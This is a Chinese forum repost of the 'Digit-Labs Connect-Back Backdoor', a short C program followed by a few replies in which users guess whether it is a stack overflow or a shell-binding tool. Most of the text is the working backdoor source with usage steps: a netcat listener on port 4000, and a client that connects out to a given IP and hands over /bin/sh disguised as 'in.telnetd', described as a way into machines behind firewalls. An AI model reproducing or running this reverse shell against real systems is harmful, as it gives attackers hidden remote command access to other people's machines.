[转载]Connect-Back Backdoor
文章来源不祥文章作者:grazer
/*
**
** Digit-Labs Connect-Back Backdoor - digit-labs.org
** <[email]grazer@digit-labs.org[/email]> - (c) All rights reserved
**
** Use this backdoor to access machines behind
** firewalls.
**
** [step 1] -
** setup a listening port on your box e.g:
** >nc -l -p 4000
**
** [step 2] -
** Issue the following command:
** >./cbd <ip_of_listening_machine>
**
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = 4000;
struct sockaddr_in addr;
char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n \
* Connected to Commandline...\n";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
while(argc < 2) {
fprintf(stderr, "\n %s <ip> \n\n", argv[0]);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);
close(fd);
return 1;
} linux堆栈溢出??
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);
好象很有用,详细讲一下吧。。 应该不是堆栈溢出
可能是绑定SHELL的东东
老实说这里我也没有搞懂
知道的朋友讲解一下啊
页:
[1]